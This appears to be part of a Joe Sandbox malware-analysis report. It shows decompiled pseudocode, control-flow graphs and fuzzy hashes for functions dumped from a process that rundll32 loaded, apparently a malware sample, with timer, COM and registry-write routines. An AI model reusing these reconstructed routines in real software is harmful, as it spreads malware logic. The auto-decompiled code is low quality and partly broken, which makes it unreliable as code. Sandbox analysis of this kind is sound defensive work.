                                                                                                                                                                                                                                    control_flow_graph 349 4c36786-4c367b2 call 4c3a7bc 353 4c36913-4c36919 349->353 354 4c367b8-4c36808 call 4c3b0c8 349->354 358 4c3691c-4c36923 353->358 361 4c36883-4c36888 354->361 362 4c3680a-4c3680d 354->362 363 4c36889-4c3688d 361->363 364 4c36818 362->364 365 4c3680f call 4c373fd 362->365 366 4c3688f-4c36891 363->366 367 4c3689d-4c368a1 363->367 369 4c36822 364->369 370 4c36814-4c36816 365->370 366->367 367->363 371 4c368a3-4c368ac 367->371 372 4c36825-4c36829 369->372 370->364 370->369 371->358 373 4c3683b-4c36864 call 4c38504 372->373 374 4c3682b-4c36832 372->374 379 4c36866-4c3686f 373->379 380 4c368ae-4c368b3 373->380 374->373 376 4c36834 374->376 376->373 379->372 383 4c36871-4c36880 call 4c33bf1 379->383 381 4c368d2-4c368da 380->381 382 4c368b5-4c368bb 380->382 385 4c368e0-4c368f3 call 4c3b0c8 381->385 382->361 384 4c368bd-4c368d0 call 4c3a1b0 382->384 383->361 384->385 392 4c368f8-4c36908 385->392 392->372 394 4c3690e 392->394 394->361
                                                                                                                                                                                                                                    C-Code - Quality: 21%
                                                                                                                                                                                                                                    			E04C36786(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				signed int _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				char _v36;
				intOrPtr _v40;
				char _v44;
				char _v88;
				char _v92;
				char* _t44;
				intOrPtr _t48;
				intOrPtr _t50;
				intOrPtr _t51;
				char _t55;
				intOrPtr _t59;
				signed int _t60;
				void* _t63;
				intOrPtr* _t64;
				void* _t65;
				signed int _t66;
				intOrPtr _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				void* _t75;

				_t44 =  &_v88;
				_v92 = 0;
				L04C3A7BC();
				__imp__(0, 1, 0, _t44, 0, 0x2c);
				_v44 = _t44;
				if(_t44 == 0) {
					__imp__();
					_v8 = _t44;
				} else {
					_v20 = 0;
					_v16 = 0;
					L04C3B0C8();
					_t72 = __imp__; // 0x76d7f710
					_v36 = _t44;
					_v32 = __edx;
					 *_t72(_v44,  &_v36, 0, 0, 0, 0,  *0x4c3d240, 0, 0xff676980, 0xffffffff);
					_t48 =  *0x4c3d26c; // 0x300
					_t64 = __imp__; // 0x76d7f730
					_v40 = _t48;
					_t50 =  *_t64(2,  &_v44, 0, 0xffffffff);
					_v8 = _t50;
					if(_t50 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x4c3d24c = 5;
						} else {
							_t63 = E04C373FD(__edx); // executed
							if(_t63 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0x4c3d260 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t66 = _v12;
						_t53 = _t66 << 4;
						_t71 = _t75 + (_t66 << 4) - 0x54;
						_t67 = _t66 + 1;
						_v24 = _t66 + 1;
						_t55 = E04C38504(_t75 + _t53 - 0x58, _t66 + 1, _t67, _t75 + _t53 - 0x58, _t71,  &_v20,  &_v16); // executed
						_v8 = _t55;
						if(_t55 != 0) {
							goto L17;
						}
						_t60 = _v24;
						_t85 = _t60 - 3;
						_v12 = _t60;
						if(_t60 != 3) {
							goto L6;
						} else {
							_v8 = E04C33BF1(_t67, _t85,  &_v92, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t55 - 0x10d2;
						if(_t55 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x4c3d244);
							goto L21;
						} else {
							__eflags =  *0x4c3d248; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t55 = E04C3A1B0();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x4c3d248);
								L21:
								L04C3B0C8();
								_v36 = _t55;
								_v32 = _t71;
								 *_t72(_v44,  &_v36, 0, 0, 0, 0); // executed
								_t59 =  *_t64(2,  &_v44, 0, 0xffffffff);
								__eflags = _t59;
								_v8 = _t59;
								if(_t59 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t73 =  &_v92;
					_t65 = 3;
					do {
						_t51 =  *_t73;
						if(_t51 != 0) {
							__imp__( *0x4c3d238, 0, _t51);
						}
						_t73 = _t73 + 0x10;
						_t65 = _t65 - 1;
					} while (_t65 != 0);
					__imp__(_v44);
				}
				return _v8;
				goto L25;
			}





























                                                                                                                                                                                                                                    0x04c36793
                                                                                                                                                                                                                                    0x04c36798
                                                                                                                                                                                                                                    0x04c3679b
                                                                                                                                                                                                                                    0x04c367a7
                                                                                                                                                                                                                                    0x04c367af
                                                                                                                                                                                                                                    0x04c367b2
                                                                                                                                                                                                                                    0x04c36913
                                                                                                                                                                                                                                    0x04c36919
                                                                                                                                                                                                                                    0x04c367b8
                                                                                                                                                                                                                                    0x04c367c6
                                                                                                                                                                                                                                    0x04c367c9
                                                                                                                                                                                                                                    0x04c367cc
                                                                                                                                                                                                                                    0x04c367d1
                                                                                                                                                                                                                                    0x04c367da
                                                                                                                                                                                                                                    0x04c367e5
                                                                                                                                                                                                                                    0x04c367e8
                                                                                                                                                                                                                                    0x04c367ea
                                                                                                                                                                                                                                    0x04c367ef
                                                                                                                                                                                                                                    0x04c367f7
                                                                                                                                                                                                                                    0x04c36801
                                                                                                                                                                                                                                    0x04c36805
                                                                                                                                                                                                                                    0x04c36808
                                                                                                                                                                                                                                    0x04c3680d
                                                                                                                                                                                                                                    0x04c36818
                                                                                                                                                                                                                                    0x04c36818
                                                                                                                                                                                                                                    0x04c3680f
                                                                                                                                                                                                                                    0x04c3680f
                                                                                                                                                                                                                                    0x04c36816
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c36816
                                                                                                                                                                                                                                    0x04c36822
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c36825
                                                                                                                                                                                                                                    0x04c36829
                                                                                                                                                                                                                                    0x04c36834
                                                                                                                                                                                                                                    0x04c36834
                                                                                                                                                                                                                                    0x04c3683b
                                                                                                                                                                                                                                    0x04c36844
                                                                                                                                                                                                                                    0x04c3684b
                                                                                                                                                                                                                                    0x04c36854
                                                                                                                                                                                                                                    0x04c36857
                                                                                                                                                                                                                                    0x04c3685a
                                                                                                                                                                                                                                    0x04c36861
                                                                                                                                                                                                                                    0x04c36864
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c36866
                                                                                                                                                                                                                                    0x04c36869
                                                                                                                                                                                                                                    0x04c3686c
                                                                                                                                                                                                                                    0x04c3686f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c36871
                                                                                                                                                                                                                                    0x04c36880
                                                                                                                                                                                                                                    0x04c36880
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c368ae
                                                                                                                                                                                                                                    0x04c368ae
                                                                                                                                                                                                                                    0x04c368b3
                                                                                                                                                                                                                                    0x04c368d2
                                                                                                                                                                                                                                    0x04c368d4
                                                                                                                                                                                                                                    0x04c368d9
                                                                                                                                                                                                                                    0x04c368da
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c368b5
                                                                                                                                                                                                                                    0x04c368b5
                                                                                                                                                                                                                                    0x04c368bb
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c368bd
                                                                                                                                                                                                                                    0x04c368bd
                                                                                                                                                                                                                                    0x04c368c2
                                                                                                                                                                                                                                    0x04c368c4
                                                                                                                                                                                                                                    0x04c368c9
                                                                                                                                                                                                                                    0x04c368ca
                                                                                                                                                                                                                                    0x04c368e0
                                                                                                                                                                                                                                    0x04c368e0
                                                                                                                                                                                                                                    0x04c368e8
                                                                                                                                                                                                                                    0x04c368f3
                                                                                                                                                                                                                                    0x04c368f6
                                                                                                                                                                                                                                    0x04c36901
                                                                                                                                                                                                                                    0x04c36903
                                                                                                                                                                                                                                    0x04c36905
                                                                                                                                                                                                                                    0x04c36908
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c3690e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c3690e
                                                                                                                                                                                                                                    0x04c36908
                                                                                                                                                                                                                                    0x04c368bb
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c368b3
                                                                                                                                                                                                                                    0x04c36883
                                                                                                                                                                                                                                    0x04c36885
                                                                                                                                                                                                                                    0x04c36888
                                                                                                                                                                                                                                    0x04c36889
                                                                                                                                                                                                                                    0x04c36889
                                                                                                                                                                                                                                    0x04c3688d
                                                                                                                                                                                                                                    0x04c36897
                                                                                                                                                                                                                                    0x04c36897
                                                                                                                                                                                                                                    0x04c3689d
                                                                                                                                                                                                                                    0x04c368a0
                                                                                                                                                                                                                                    0x04c368a0
                                                                                                                                                                                                                                    0x04c368a6
                                                                                                                                                                                                                                    0x04c368a6
                                                                                                                                                                                                                                    0x04c36923
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002C.00000002.504260205.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504173703.0000000004C30000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504486235.0000000004C3C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504598622.0000000004C3D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504651728.0000000004C3F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_44_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 00b1e5946dbc9184d2c3ecca9b79641a024c43d3cce192bc2dd26874098b309a
                                                                                                                                                                                                                                    • Instruction ID: 48ce6cff417ba93398e5ffb0920d9757949738d6c3886166f765129e705a141d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 00b1e5946dbc9184d2c3ecca9b79641a024c43d3cce192bc2dd26874098b309a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 01517CB5901228BBDF20DF94DC44EEEBFB9EF49326F204116F811B2180D775AA40DBA1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 04C39152, Relevance: .1, Instructions: 112COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 395 4c39152-4c39178 397 4c39246-4c3924c 395->397 398 4c3917e-4c39192 call 4c33aef 395->398 400 4c39197-4c3919b 398->400 401 4c391a1-4c391a6 400->401 402 4c3923d-4c39242 400->402 403 4c391a8-4c391ab 401->403 404 4c391be-4c391c0 401->404 402->397 403->404 405 4c391ad-4c391bc 403->405 404->402 406 4c391c2-4c391e8 404->406 405->404 409 4c39216-4c3921b 406->409 410 4c391ea-4c391f6 call 4c37c14 406->410 412 4c39223-4c3922c 409->412 413 4c3921d-4c3921f 409->413 410->409 417 4c391f8-4c391fd 410->417 415 4c39233-4c39236 412->415 416 4c3922e 412->416 413->412 415->402 418 4c39238 415->418 416->415 417->409 419 4c391ff-4c39202 417->419 418->402 419->409 420 4c39204-4c39214 419->420 420->409
                                                                                                                                                                                                                                    C-Code - Quality: 75%
                                                                                                                                                                                                                                    			E04C39152(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E04C33AEF(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x4c3d27c; // 0x202a5a8
						_t20 = _t68 + 0x4c3e1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E04C37C14(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6; // 0x7414d5b0
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}





















                                                                                                                                                                                                                                    0x04c39158
                                                                                                                                                                                                                                    0x04c3915b
                                                                                                                                                                                                                                    0x04c3916b
                                                                                                                                                                                                                                    0x04c39174
                                                                                                                                                                                                                                    0x04c39178
                                                                                                                                                                                                                                    0x04c39246
                                                                                                                                                                                                                                    0x04c3924c
                                                                                                                                                                                                                                    0x04c3924c
                                                                                                                                                                                                                                    0x04c39192
                                                                                                                                                                                                                                    0x04c39197
                                                                                                                                                                                                                                    0x04c3919b
                                                                                                                                                                                                                                    0x04c391a1
                                                                                                                                                                                                                                    0x04c391a6
                                                                                                                                                                                                                                    0x04c391ad
                                                                                                                                                                                                                                    0x04c391bc
                                                                                                                                                                                                                                    0x04c391bc
                                                                                                                                                                                                                                    0x04c391c0
                                                                                                                                                                                                                                    0x04c391c2
                                                                                                                                                                                                                                    0x04c391ce
                                                                                                                                                                                                                                    0x04c391d9
                                                                                                                                                                                                                                    0x04c391e4
                                                                                                                                                                                                                                    0x04c391e8
                                                                                                                                                                                                                                    0x04c391f2
                                                                                                                                                                                                                                    0x04c391f6
                                                                                                                                                                                                                                    0x04c391f8
                                                                                                                                                                                                                                    0x04c391fd
                                                                                                                                                                                                                                    0x04c39204
                                                                                                                                                                                                                                    0x04c39214
                                                                                                                                                                                                                                    0x04c39214
                                                                                                                                                                                                                                    0x04c391fd
                                                                                                                                                                                                                                    0x04c391f6
                                                                                                                                                                                                                                    0x04c39216
                                                                                                                                                                                                                                    0x04c3921b
                                                                                                                                                                                                                                    0x04c39220
                                                                                                                                                                                                                                    0x04c39220
                                                                                                                                                                                                                                    0x04c39226
                                                                                                                                                                                                                                    0x04c3922c
                                                                                                                                                                                                                                    0x04c39231
                                                                                                                                                                                                                                    0x04c39231
                                                                                                                                                                                                                                    0x04c39236
                                                                                                                                                                                                                                    0x04c3923b
                                                                                                                                                                                                                                    0x04c3923b
                                                                                                                                                                                                                                    0x04c39236
                                                                                                                                                                                                                                    0x04c391c0
                                                                                                                                                                                                                                    0x04c3923d
                                                                                                                                                                                                                                    0x04c39243
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002C.00000002.504260205.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504173703.0000000004C30000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504486235.0000000004C3C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504598622.0000000004C3D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504651728.0000000004C3F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_44_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 25a97b9a5a60192edb3f4f8a165e3db89ddc90547f71c48394f4f338e114e70c
                                                                                                                                                                                                                                    • Instruction ID: da817ced5ade57a79397a5ef7d1ca2a9f18b54d2122286d21e8675f0e243d0b8
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 25a97b9a5a60192edb3f4f8a165e3db89ddc90547f71c48394f4f338e114e70c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 11317CB6900518AFCB21DFA5C888CAFBB7AFFC97417144658F8159B210E372ED51DBA0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 04C3269C, Relevance: .1, Instructions: 102COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 422 4c3269c-4c326b0 423 4c326b2-4c326b7 422->423 424 4c326ba-4c326cc call 4c36b43 422->424 423->424 427 4c32720-4c3272d 424->427 428 4c326ce-4c326d2 424->428 429 4c3272f-4c32746 427->429 430 4c326d9-4c326de 428->430 433 4c32784-4c327a6 429->433 434 4c32748-4c32759 429->434 430->429 431 4c326e0-4c326f0 430->431 431->429 437 4c326f2-4c326ff 431->437 434->433 438 4c3275b-4c32764 434->438 441 4c32701-4c3270d call 4c32496 437->441 442 4c3270f-4c3271e 437->442 443 4c32766-4c32772 call 4c32496 438->443 444 4c32775-4c32778 438->444 441->442 442->429 443->444 444->433
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002C.00000002.504260205.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504173703.0000000004C30000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504486235.0000000004C3C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504598622.0000000004C3D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504651728.0000000004C3F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_44_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: f2b38151c1864fd696f353188120d6b3288afa8bcacc50723026644f6deddc50
                                                                                                                                                                                                                                    • Instruction ID: 31ba1cf31bff65f8dcafad15fc5726209a48a3818f3c5dc889e1e7230ff45260
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f2b38151c1864fd696f353188120d6b3288afa8bcacc50723026644f6deddc50
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8331E776A00205AFEB11DF69D881BAEB7FAFF48252F144069E405D7250EB34EE459B10
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 04C33AEF, Relevance: .1, Instructions: 98COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 450 4c33aef-4c33b30 452 4c33b32-4c33b3b 450->452 453 4c33bb1-4c33bb7 450->453 454 4c33b7b-4c33b7e 452->454 455 4c33b3d-4c33b4d 452->455 456 4c33b80-4c33b8f 454->456 457 4c33bdb 454->457 463 4c33b58-4c33b70 455->463 464 4c33b4f-4c33b56 455->464 465 4c33b91 456->465 466 4c33bba-4c33bd9 456->466 459 4c33bdd-4c33be0 457->459 460 4c33be2-4c33bef 459->460 461 4c33b98-4c33b9a 459->461 460->453 467 4c33ba3-4c33ba6 461->467 468 4c33b9c 461->468 470 4c33b74-4c33b79 463->470 464->467 465->461 466->459 467->453 469 4c33ba8 467->469 468->467 469->453 470->454 470->467
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002C.00000002.504260205.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504173703.0000000004C30000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504486235.0000000004C3C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504598622.0000000004C3D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504651728.0000000004C3F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_44_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: a99d01f29d6d71aa247ede4238708413cc5a03a92a3deee771b5e3935a3b73a6
                                                                                                                                                                                                                                    • Instruction ID: b127a818dddf64a7ce021aa98e6c99e2f3e2483b469de294539edf6780431428
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a99d01f29d6d71aa247ede4238708413cc5a03a92a3deee771b5e3935a3b73a6
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 47310E76900149EFCB05DF99D4C48AE7BB5FF48346B10846EF90AA7210E735AA45CFA1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 04C373FD, Relevance: .1, Instructions: 94COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 472 4c373fd-4c37417 call 4c3a72d 475 4c37419 472->475 476 4c3741c-4c3743e call 4c31262 472->476 475->476 479 4c37444-4c3745e 476->479 480 4c374fd-4c37502 476->480 485 4c37464-4c37480 call 4c37cb8 479->485 486 4c374ed-4c374ef 479->486 481 4c37504 call 4c31f99 480->481 482 4c37509-4c3750f 480->482 481->482 487 4c374f0-4c374f5 485->487 490 4c37482-4c37494 call 4c389d6 485->490 486->487 487->480 492 4c37499-4c3749b 490->492 493 4c374bd-4c374eb call 4c32659 492->493 494 4c3749d-4c374a4 492->494 493->487 494->493 495 4c374a6-4c374b8 call 4c389d6 494->495 495->493
                                                                                                                                                                                                                                    C-Code - Quality: 62%
                                                                                                                                                                                                                                    			E04C373FD(void* __edx) {
				char _v8;
				char _v12;
				char _v16;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				void* _t37;
				intOrPtr _t38;
				void* _t40;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				intOrPtr* _t52;
				void* _t55;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E04C3A72D(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x4c3d27c; // 0x202a5a8
				_t4 = _t24 + 0x4c3ede0; // 0x6c69388
				_t5 = _t24 + 0x4c3ed88; // 0x4f0053
				_t26 = E04C31262( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					 *0x4c3d0f4(_v16, 0,  &_v12);
					_t52 = __imp__; // 0x76d25520
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x4c3d27c; // 0x202a5a8
						_t11 = _t32 + 0x4c3edd4; // 0x6c6937c
						_t48 = _t11;
						_t12 = _t32 + 0x4c3ed88; // 0x4f0053
						_t55 = E04C37CB8(_t11, _t12, _t11);
						_t59 = _t55;
						if(_t55 != 0) {
							_t35 =  *0x4c3d27c; // 0x202a5a8
							_t13 = _t35 + 0x4c3ee1e; // 0x30314549
							_t37 = E04C389D6(_t48, _t50, _t59, _v8, _t55, _t13, 0x14); // executed
							if(_t37 == 0) {
								_t61 =  *0x4c3d25c - 6;
								if( *0x4c3d25c <= 6) {
									_t42 =  *0x4c3d27c; // 0x202a5a8
									_t15 = _t42 + 0x4c3ec2a; // 0x52384549
									E04C389D6(_t48, _t50, _t61, _v8, _t55, _t15, 0x13);
								}
							}
							_t38 =  *0x4c3d27c; // 0x202a5a8
							_t17 = _t38 + 0x4c3ee18; // 0x6c693c0
							_t18 = _t38 + 0x4c3edf0; // 0x680043
							_t40 = E04C32659(_v8, 0x80000001, _t55, _t18, _t17);
							_t45 = _t40;
							 *_t52( *0x4c3d238, 0, _t55);
						}
					}
					 *_t52( *0x4c3d238, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E04C31F99(_t54);
				}
				return _t45;
			}




















                                                                                                                                                                                                                                    0x04c373fd
                                                                                                                                                                                                                                    0x04c3740d
                                                                                                                                                                                                                                    0x04c37410
                                                                                                                                                                                                                                    0x04c37417
                                                                                                                                                                                                                                    0x04c37419
                                                                                                                                                                                                                                    0x04c37419
                                                                                                                                                                                                                                    0x04c3741c
                                                                                                                                                                                                                                    0x04c37421
                                                                                                                                                                                                                                    0x04c37428
                                                                                                                                                                                                                                    0x04c37435
                                                                                                                                                                                                                                    0x04c3743a
                                                                                                                                                                                                                                    0x04c3743e
                                                                                                                                                                                                                                    0x04c3744c
                                                                                                                                                                                                                                    0x04c37452
                                                                                                                                                                                                                                    0x04c3745a
                                                                                                                                                                                                                                    0x04c3745e
                                                                                                                                                                                                                                    0x04c374ef
                                                                                                                                                                                                                                    0x04c374ef
                                                                                                                                                                                                                                    0x04c37464
                                                                                                                                                                                                                                    0x04c37464
                                                                                                                                                                                                                                    0x04c37469
                                                                                                                                                                                                                                    0x04c37469
                                                                                                                                                                                                                                    0x04c37470
                                                                                                                                                                                                                                    0x04c3747c
                                                                                                                                                                                                                                    0x04c3747e
                                                                                                                                                                                                                                    0x04c37480
                                                                                                                                                                                                                                    0x04c37482
                                                                                                                                                                                                                                    0x04c37489
                                                                                                                                                                                                                                    0x04c37494
                                                                                                                                                                                                                                    0x04c3749b
                                                                                                                                                                                                                                    0x04c3749d
                                                                                                                                                                                                                                    0x04c374a4
                                                                                                                                                                                                                                    0x04c374a6
                                                                                                                                                                                                                                    0x04c374ad
                                                                                                                                                                                                                                    0x04c374b8
                                                                                                                                                                                                                                    0x04c374b8
                                                                                                                                                                                                                                    0x04c374a4
                                                                                                                                                                                                                                    0x04c374bd
                                                                                                                                                                                                                                    0x04c374c2
                                                                                                                                                                                                                                    0x04c374c9
                                                                                                                                                                                                                                    0x04c374d9
                                                                                                                                                                                                                                    0x04c374e7
                                                                                                                                                                                                                                    0x04c374e9
                                                                                                                                                                                                                                    0x04c374e9
                                                                                                                                                                                                                                    0x04c37480
                                                                                                                                                                                                                                    0x04c374fb
                                                                                                                                                                                                                                    0x04c374fb
                                                                                                                                                                                                                                    0x04c374fd
                                                                                                                                                                                                                                    0x04c37502
                                                                                                                                                                                                                                    0x04c37504
                                                                                                                                                                                                                                    0x04c37504
                                                                                                                                                                                                                                    0x04c3750f

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002C.00000002.504260205.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504173703.0000000004C30000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504486235.0000000004C3C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504598622.0000000004C3D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504651728.0000000004C3F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_44_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
